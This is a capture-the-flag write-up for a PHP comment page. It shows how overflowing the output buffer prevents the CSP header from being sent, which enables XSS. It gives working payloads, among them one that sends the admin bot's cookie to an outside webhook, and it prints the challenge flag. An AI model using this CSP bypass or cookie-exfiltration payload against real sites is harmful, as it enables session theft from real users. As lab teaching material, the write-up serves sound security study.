In index.php, the echo command is called before calling header() function.
That might not trigger the CSP header, which can eventually let us execute Javascript code. Let’s verify it.
Send a comment payload like below.
comment = lol<img src=1 onerror=alert(1)>However, no alert is popped up. After searching on Google, I know that it is due to PHP Output Buffering (link) behaviour. If you read this line of code in Dockerfile.
RUN sed -i '215s/4096/8192/' /etc/php/7.4/fpm/php.iniIt edits the PHP configuration line, particularly, at line 215, change 4096 to 8192. This means change the output buffering size from 4096 bytes to 8192 bytes.
Now we know that our first payload does not work because the buffer is not filled, then it waits until the header() function is called and send to browser.
So our target is to overflow 8192 bytes, but the $comment is limited to 500 characters.
Now here comes the magic. If we have script in comment text, it will echo additionally “Malicious string Detected !!!!!” and then the comment after filtering “script”. What matters is that it runs inside a while loop, which keeps echo as long as “script” exists.
—> This is where we can perform buffer overflow.
The idea is to let the while loops run as long as possible, to overflow 8192 bytes. We can achieve that by adding a long string like this.
scrscrscrscrscrscr...iptiptiptiptiptiptThis payload each time removes a “script” text in between, then the string then forms another “script” in the middle again.
Let’s send a new payload.
lol<img src=1 onerror=alert(1)> scrscrscrscrscrscr...iptiptiptiptiptiptThis time, the alert poped up. Yay, we can perform XSS. Now we just need to send the payload to the bot and steals the cookie.
Remember to URL encode before send:
lol<svg onload=location.href="{webhook_url}?cookie="+encodeURIComponent(document.cookie)> scrscrscrscrscrscr...iptiptiptiptiptipt🚩 FLAG: DH{8b8d436dfb2a5a5459b9eb85fba631060ca6417fead150edb68980e107f5b90}